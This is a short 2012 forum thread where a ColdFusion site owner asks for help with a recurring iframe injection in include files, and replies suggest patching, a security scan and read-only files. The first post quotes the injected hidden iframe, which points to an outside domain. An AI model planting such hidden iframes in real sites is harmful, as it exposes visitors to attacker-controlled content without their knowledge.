September 10th, 2012, 06:06 AM
Iframe Injection Attack in Coldfusion
Hi I really need some help!
Recently one of my sites have been hit with an iframe injection:
<iframe scrolling="no" frameborder="0" src="the source changes but normally htttp://collegefun4u.com/" width="0" height="1"></iframe>
It happens at random times and gets inserted in random include files.
We have clean scanned all computers + server for viruses, changed all ftp/remote desktop passwords but the problem still occurs.
I don't think that it's an SQL injection attack because it is not hitting the database and only being injected into include files.
Some advice would really be appreciated as I have tried extensivley to get rid of it with no avail!
I am currently using CF9 runnning on a Windows 2003 server.
September 10th, 2012, 09:29 AM
Assuming you have applied all updates for your JVM, CF 9, Windows, and web server, you can try using this service. It remotely scans your server and identifies security issues with it. It's widely used and reliable. http://hackmycf.com/
Last edited by kiteless; September 10th, 2012 at 09:45 AM.
September 11th, 2012, 01:04 PM
You could try changing your files to read-only. If, after changing them to read-only they continue to be edited, you can likely conclude that the attacker has admin access to your box. If you are not hosting your own server, then you should contact your host and let them know there is a vulnerability.
I know that doesn't really help you solve the issue, but it can help narrow things down.
Last edited by rawk; September 11th, 2012 at 01:06 PM.